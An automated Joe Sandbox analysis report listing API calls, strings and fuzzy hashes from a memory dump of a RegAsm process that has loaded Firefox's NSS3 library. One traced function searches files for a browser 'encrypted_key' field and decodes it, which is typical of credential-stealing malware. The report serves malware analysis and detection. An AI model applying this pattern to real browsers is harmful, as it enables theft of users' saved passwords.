Part of subcall function 6C1B0BE0: malloc.MOZGLUE(6C1A8D2D,?,00000000,?), ref: 6C1B0BF8
Part of subcall function 6C1B0BE0: TlsGetValue.KERNEL32(6C1A8D2D,?,00000000,?), ref: 6C1B0C15

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C19EEE1

Part of subcall function 6C191D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6C191D7E
Part of subcall function 6C191D50: EnterCriticalSection.KERNEL32(?), ref: 6C191D8E
Part of subcall function 6C191D50: PR_Unlock.NSS3(?), ref: 6C191DD3

TlsGetValue.KERNEL32 ref: 6C19EE51
EnterCriticalSection.KERNEL32(?), ref: 6C19EE65
PR_Unlock.NSS3(?), ref: 6C19EEA2
free.MOZGLUE(?), ref: 6C19EEBB
PR_SetError.NSS3(00000000,00000000), ref: 6C19EED0
PR_Unlock.NSS3(?), ref: 6C19EF48
free.MOZGLUE(?), ref: 6C19EF68
PR_SetError.NSS3(00000000,00000000), ref: 6C19EF7D
PK11_DoesMechanism.NSS3(?,?), ref: 6C19EFA4
free.MOZGLUE(?), ref: 6C19EFDA
PR_SetError.NSS3(FFFFE040,00000000), ref: 6C19F055
free.MOZGLUE(?), ref: 6C19F060

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
String ID:
API String ID: 2524771861-0
Opcode ID: 174b3fb85275efd6aaa1ce287bf3da6c6a8ecc74ce8f2f0aca5a938f21c0796b
Instruction ID: 1de63560092a1134393fcdead2d268115a55c72d108df138aad9f86808327078
Opcode Fuzzy Hash: 174b3fb85275efd6aaa1ce287bf3da6c6a8ecc74ce8f2f0aca5a938f21c0796b
Instruction Fuzzy Hash: 208171B1A00209ABDF00DFA5DC85BEE7BB5BF08318F154024ED19A3751E731E964CBA1

Function 6C164CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON

Download Yara Rule

APIs

PK11_SignatureLen.NSS3(?), ref: 6C164D80
PORT_Alloc_Util.NSS3(00000000), ref: 6C164D95
PORT_NewArena_Util.NSS3(00000800), ref: 6C164DF2
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C164E2C
PR_SetError.NSS3(FFFFE028,00000000), ref: 6C164E43
PORT_NewArena_Util.NSS3(00000800), ref: 6C164E58
SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6C164E85
DER_Encode_Util.NSS3(?,?,6C2B05A4,00000000), ref: 6C164EA7
PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6C164F17
DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6C164F45
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C164F62
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C164F7A
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C164F89
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C164FC8

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
String ID:
API String ID: 2843999940-0
Opcode ID: bc76dbb433c6d32ac16c976ae8d72aa7844f0e794ebb5e35df061d81f2286f3d
Instruction ID: 04255219c04d1efa2b5d72b18c93ffd167da639d454619672dbeebe07f3011a5
Opcode Fuzzy Hash: bc76dbb433c6d32ac16c976ae8d72aa7844f0e794ebb5e35df061d81f2286f3d
Instruction Fuzzy Hash: EE81C2719083019FE701CF2AD850B5BB7E4AF94308F1589ADF958DBB40E735E915CB92

Function 6C160470 Relevance: 21.2, APIs: 14, Instructions: 206timeCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C1604B7

Part of subcall function 6C1B0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C1587ED,00000800,6C14EF74,00000000), ref: 6C1B1000
Part of subcall function 6C1B0FF0: PR_NewLock.NSS3(?,00000800,6C14EF74,00000000), ref: 6C1B1016
Part of subcall function 6C1B0FF0: PL_InitArenaPool.NSS3(00000000,security,6C1587ED,00000008,?,00000800,6C14EF74,00000000), ref: 6C1B102B

PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C160539

Part of subcall function 6C1B1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C1588A4,00000000,00000000), ref: 6C1B1228
Part of subcall function 6C1B1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C1B1238
Part of subcall function 6C1B1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C1588A4,00000000,00000000), ref: 6C1B124B
Part of subcall function 6C1B1200: PR_CallOnce.NSS3(6C2B2AA4,6C1B12D0,00000000,00000000,00000000,?,6C1588A4,00000000,00000000), ref: 6C1B125D
Part of subcall function 6C1B1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C1B126F
Part of subcall function 6C1B1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C1B1280
Part of subcall function 6C1B1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C1B128E
Part of subcall function 6C1B1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C1B129A
Part of subcall function 6C1B1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C1B12A1

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C16054A
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C16056D
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C1605CA
DER_GeneralizedTimeToTime_Util.NSS3(?,?), ref: 6C1605EA
PR_SetError.NSS3(FFFFE00C,00000000), ref: 6C1605FD
PR_SetError.NSS3(FFFFE07E,00000000), ref: 6C160621
PR_EnterMonitor.NSS3 ref: 6C16063E
PR_ExitMonitor.NSS3 ref: 6C160668
CERT_DestroyCertificate.NSS3(?), ref: 6C160697
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C1606AC
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C1606CC
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C1606DA

Part of subcall function 6C15E6B0: PORT_ArenaMark_Util.NSS3(00000000,?,00000000,?,?,6C1604DC,?,?), ref: 6C15E6C9
Part of subcall function 6C15E6B0: PORT_ArenaAlloc_Util.NSS3(00000000,00000088,?,?,00000000,?,?,6C1604DC,?,?), ref: 6C15E6D9
Part of subcall function 6C15E6B0: memset.VCRUNTIME140(00000000,00000000,00000088,?,?,?,?,00000000,?,?,6C1604DC,?,?), ref: 6C15E6F4
Part of subcall function 6C15E6B0: SECOID_SetAlgorithmID_Util.NSS3(00000000,00000000,00000004,00000000,?,?,?,?,?,?,?,00000000,?,?,6C1604DC,?), ref: 6C15E703
Part of subcall function 6C15E6B0: CERT_FindCertIssuer.NSS3(?,?,6C1604DC,0000000B,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C15E71E

Part of subcall function 6C15F660: PR_EnterMonitor.NSS3(6C16050F,?,00000001,?,?,?), ref: 6C15F6A8
Part of subcall function 6C15F660: PR_Now.NSS3(?,?,?,00000001,?,?,?), ref: 6C15F6C1
Part of subcall function 6C15F660: PR_ExitMonitor.NSS3(?,?,?,00000001,?,?,?), ref: 6C15F7C8

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Util$ArenaArena_ErrorFree$Monitor$EnterPool$CriticalExitSectionfree$AlgorithmAlloc_CallCertCertificateClearDeleteDestroyFindGeneralizedInitIssuerLockMark_OnceTimeTime_UnlockValuecallocmemset
String ID:
API String ID: 2470852775-0
Opcode ID: 982cdac86f7ef7186234f3b38b06805cf2e1eeef50c4f52f634f4efe27f8ef6e
Instruction ID: 48f63c0c1abb684ccef415fa84916b442a0d5830015944db91112d051e2c3fd6
Opcode Fuzzy Hash: 982cdac86f7ef7186234f3b38b06805cf2e1eeef50c4f52f634f4efe27f8ef6e
Instruction Fuzzy Hash: CB6105B1A043419FDB10CF2ACC50B5B77E4AF94358F104528FD5597B91E730E929CB9A

Function 6C224C40 Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 97COMMON

Download Yara Rule

APIs

sqlite3_value_text16.NSS3(?), ref: 6C224CAF
sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C224CFD
sqlite3_value_text16.NSS3(?), ref: 6C224D44

Strings

API call with %s database connection pointer, xrefs: 6C224CF6
unknown error, xrefs: 6C224D56
invalid, xrefs: 6C224CF1
another row available, xrefs: 6C224D20
DATA=C:\Users\user\Ap, xrefs: 6C224D60
out of memory, xrefs: 6C224C78, 6C224C9E
no more rows available, xrefs: 6C224D2E
bad parameter or other API misuse, xrefs: 6C224D05
abort due to ROLLBACK, xrefs: 6C224D27, 6C224D33

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: sqlite3_value_text16$sqlite3_log
String ID: API call with %s database connection pointer$DATA=C:\Users\user\Ap$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
API String ID: 2274617401-1461674692
Opcode ID: c29c48c0472875d011020d1fd9b78288622999ceb29bdbc092b04712746eccaa
Instruction ID: b3928946b14e789b4f54758afcaad306bf94d1cba4345a1628995e5b3aa27acf
Opcode Fuzzy Hash: c29c48c0472875d011020d1fd9b78288622999ceb29bdbc092b04712746eccaa
Instruction Fuzzy Hash: 5631CE77E08A1FA7D7094A2CA811BE5B721778231EF050126EC244BF94CBACBC55C7E2

Function 6C196C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C19781D,00000000,6C18BE2C,?,6C196B1D,?,?,?,?,00000000,00000000,6C19781D), ref: 6C196C40
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C19781D,?,6C18BE2C,?), ref: 6C196C58
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C19781D), ref: 6C196C6F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C196C84
PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C196C96

Part of subcall function 6C141240: TlsGetValue.KERNEL32(00000040,?,6C14116C,NSPR_LOG_MODULES), ref: 6C141267
Part of subcall function 6C141240: EnterCriticalSection.KERNEL32(?,?,?,6C14116C,NSPR_LOG_MODULES), ref: 6C14127C
Part of subcall function 6C141240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C14116C,NSPR_LOG_MODULES), ref: 6C141291
Part of subcall function 6C141240: PR_Unlock.NSS3(?,?,?,?,6C14116C,NSPR_LOG_MODULES), ref: 6C1412A0

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C196CAA

Strings

sql:, xrefs: 6C196C52
dbm, xrefs: 6C196CA4
dbm:, xrefs: 6C196C3A
NSS_DEFAULT_DB_TYPE, xrefs: 6C196C91
rdb:, xrefs: 6C196C69
extern:, xrefs: 6C196C7E

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
API String ID: 4221828374-3736768024
Opcode ID: 8398b45c7475ed11d101555f03cefcbce8ff613330ca5d5748d499f8732ec31b
Instruction ID: 9607eeb7922de33e97affd7a29c79806ca17fd59a0a9d46c3c4f054f1b846e6f
Opcode Fuzzy Hash: 8398b45c7475ed11d101555f03cefcbce8ff613330ca5d5748d499f8732ec31b
Instruction Fuzzy Hash: A801D6F170230927FA4027BA6D8AF66355C9F41958F140431FF08E09C1FB96E514C0F5

Function 6C1A25F0 Relevance: 19.9, APIs: 8, Strings: 5, Instructions: 403stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C1AA0A0: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C17A5DF,?,00000000,6C1528AD,00000000,?,6C17A5DF,?,object), ref: 6C1AA0C0
Part of subcall function 6C1AA0A0: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C17A5DF,?,00000000,6C1528AD,00000000,?,6C17A5DF,?,object), ref: 6C1AA0E8

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C1A2834
memcmp.VCRUNTIME140(00000000,00000020,00000020,?,?,?,?,?,?,?,?), ref: 6C1A284B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C1A2A98
memcmp.VCRUNTIME140(00000000,?,00000020,?,?,?,?,?,?,?,?,?,?), ref: 6C1A2AAF
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C1A2BDC
memcmp.VCRUNTIME140(00000000,?,00000010,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C1A2BF3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C1A2D23
memcmp.VCRUNTIME140(00000000,?,00000010,?,?,?,?,?,?,?,?,?), ref: 6C1A2D34

Strings

token, xrefs: 6C1A25FA
model, xrefs: 6C1A2C06
serial, xrefs: 6C1A2AC2
, xrefs: 6C1A2A8E, 6C1A2AAB
manufacturer, xrefs: 6C1A285E

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: memcmpstrlen$strcmp
String ID: $manufacturer$model$serial$token
API String ID: 2407968032-2628435027
Opcode ID: 181678997e093db912494b4ae89fa00e6ac4c00593f12674f8c76522f1ff3c42
Instruction ID: 777c7ce646061f2a5eff74751092e49e2298cec8416f172bbf2f436cfd9099fa
Opcode Fuzzy Hash: 181678997e093db912494b4ae89fa00e6ac4c00593f12674f8c76522f1ff3c42
Instruction Fuzzy Hash: 9502C0A9E0C3C96EF73187A3C88CBD13AE05B2531CF4D15F5D94D8BAA3C2AC459A9351

Function 6C14ACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C14ACE2
malloc.MOZGLUE(00000001), ref: 6C14ACEC
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C14AD02
TlsGetValue.KERNEL32 ref: 6C14AD3C
calloc.MOZGLUE(00000001,?), ref: 6C14AD8C
PR_Unlock.NSS3 ref: 6C14ADC0
free.MOZGLUE(00000000), ref: 6C14AE48
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C14AE58
free.MOZGLUE(00000000), ref: 6C14AE69
free.MOZGLUE(?), ref: 6C14AE78
PR_Unlock.NSS3 ref: 6C14AE8C
free.MOZGLUE(?), ref: 6C14AEAB
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C14AEC7

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
String ID:
API String ID: 786543732-0
Opcode ID: 9cc8b0f1320e32430cf1f134fabb4b87221355f7e2f436f2f4c923c29f040fb4
Instruction ID: fc595013b738deee325b28d5112e906373128a19faa80071e3adcd931a405126
Opcode Fuzzy Hash: 9cc8b0f1320e32430cf1f134fabb4b87221355f7e2f436f2f4c923c29f040fb4
Instruction Fuzzy Hash: 7651E0B0E012169BDF00DF98DC49BAE77B4BB16348F168035DC14A3B80E331A995CBE6

Function 6C0F2450 Relevance: 19.2, APIs: 15, Instructions: 440COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C0F24BA
LeaveCriticalSection.KERNEL32(?), ref: 6C0F250D
EnterCriticalSection.KERNEL32(?), ref: 6C0F2554
LeaveCriticalSection.KERNEL32(?), ref: 6C0F25A7
EnterCriticalSection.KERNEL32(?), ref: 6C0F2609
LeaveCriticalSection.KERNEL32(?), ref: 6C0F265F
EnterCriticalSection.KERNEL32(?), ref: 6C0F26A2
LeaveCriticalSection.KERNEL32(?), ref: 6C0F26F5
EnterCriticalSection.KERNEL32(?), ref: 6C0F2764
LeaveCriticalSection.KERNEL32(?), ref: 6C0F2898
EnterCriticalSection.KERNEL32(?), ref: 6C0F28D0
EnterCriticalSection.KERNEL32(?), ref: 6C0F2948
LeaveCriticalSection.KERNEL32(?), ref: 6C0F299B
EnterCriticalSection.KERNEL32(?), ref: 6C0F29E2
LeaveCriticalSection.KERNEL32(?), ref: 6C0F2A31

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$Enter$Leave
String ID:
API String ID: 2801635615-0
Opcode ID: 7add456a81ab2710a23bded354df2bf9c0d15773c6304f8e9e472a15a36c8696
Instruction ID: 924f41cec3fd6413f2a69c64a9d4951aa98734c89a53076c99384f7ea7b74780
Opcode Fuzzy Hash: 7add456a81ab2710a23bded354df2bf9c0d15773c6304f8e9e472a15a36c8696
Instruction Fuzzy Hash: F5F1C431A01654CBDB089FA5E99D76E37F0BF47718B180129DC2667680CF39A9C3CB96

Function 00415765 Relevance: 18.2, APIs: 12, Instructions: 188stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0041579D
_memset.LIBCMT ref: 004157AE

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 004157D9
lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 004157F7
lstrcatA.KERNEL32(?,?,?,?,?,?,?,?), ref: 0041580B
lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 0041581E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416FD4,004366CB,?,?,?,?,004184E8), ref: 0041050D

Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99

Part of subcall function 0040819F: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 004121E7: GlobalAlloc.KERNEL32(00000000,?,?,?,?,?,004158B4,?), ref: 004121F2

StrStrA.SHLWAPI(00000000), ref: 004158C2
GlobalFree.KERNEL32(?), ref: 004159E4

Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32($g@,00000000,00000001,00000000,?,00000000,00000000), ref: 00408060
Part of subcall function 00408048: LocalAlloc.KERNEL32(00000040,?,?,?,00406724,?), ref: 0040806E
Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00408084
Part of subcall function 00408048: LocalFree.KERNEL32(?,?,?,00406724,?), ref: 00408093

lstrcatA.KERNEL32(?,00000000), ref: 00415970
StrCmpCA.SHLWAPI(?,00436645), ref: 0041598D
lstrcatA.KERNEL32(?,?), ref: 004159AC
lstrcatA.KERNEL32(?,00436A80), ref: 004159BD

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$File$AllocLocal$BinaryCryptFreeGlobalString_memset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
String ID:
API String ID: 4109952398-0
Opcode ID: 6a20813e9c28db49408c7dc452a5ee56f8fb4cab6dc239dc4bb3392b8e6c1110
Instruction ID: 474a71f7c11453fe018cc22432669622f52c5d25e5803fc2142599841c68fa7d
Opcode Fuzzy Hash: 6a20813e9c28db49408c7dc452a5ee56f8fb4cab6dc239dc4bb3392b8e6c1110
Instruction Fuzzy Hash: 91714DB1D4022D9BDF20DF21DC45BCAB7BAAB88314F0405E6E509E3250EB369FA58F55

Function 6C222D40 Relevance: 18.2, APIs: 12, Instructions: 187COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C222D9F

Part of subcall function 6C0DCA30: EnterCriticalSection.KERNEL32(?,?,?,6C13F9C9,?,6C13F4DA,6C13F9C9,?,?,6C10369A), ref: 6C0DCA7A
Part of subcall function 6C0DCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C0DCB26

sqlite3_exec.NSS3(?,?,6C222F70,?,?), ref: 6C222DF9
sqlite3_free.NSS3(00000000), ref: 6C222E2C
sqlite3_free.NSS3(?), ref: 6C222E3A
sqlite3_free.NSS3(?), ref: 6C222E52
sqlite3_mprintf.NSS3(6C28AAF9,?), ref: 6C222E62
sqlite3_free.NSS3(?), ref: 6C222E70
sqlite3_free.NSS3(?), ref: 6C222E89
sqlite3_free.NSS3(?), ref: 6C222EBB
sqlite3_free.NSS3(?), ref: 6C222ECB
sqlite3_free.NSS3(00000000), ref: 6C222F3E
sqlite3_free.NSS3(?), ref: 6C222F4C

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
